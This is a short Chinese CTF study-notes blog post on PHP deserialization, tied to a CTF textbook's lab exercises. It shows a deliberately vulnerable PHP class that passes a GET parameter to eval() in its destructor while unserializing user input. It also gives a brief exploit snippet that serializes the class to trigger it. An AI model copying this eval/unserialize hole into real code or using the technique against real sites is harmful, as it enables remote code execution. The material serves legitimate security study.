《从0到1:CTFer成长之路》初识反序列化

本文介绍了CTFer在学习反序列化过程中的基础知识和实践应用,重点探讨了ThinkPHP的反序列化利用链,包括常见的反序列化场景、Exploit构造方法以及如何通过改变源码实现特定目的。同时,文章提供了相关的攻击代码示例和网站资源,帮助读者深入理解反序列化的攻击方式。
摘要由CSDN通过智能技术生成


介绍:记录一下笔记,方便以后迅速回忆使用。

《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》

常见的反序列化(先了解下原理再做)

常见的反序列化-1

  • 网站http://localhost:8808/2021/2021_2/ctf_0_1/thinkphp/ser.php
<?php
    class test{
   
        function __destruct(){
   
            echo "destruruct..<br>";
            eval($_GET['cmd']);
        }
    }
    unserialize($_GET['u']);
?>
  • Exploit构造

通过反序列化攻击,改变源码实现我们目的,原来test类未执行,现在我们让他执行.

<?php
	class test{
   }
	$test = new test;
	echo serialize($test)
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值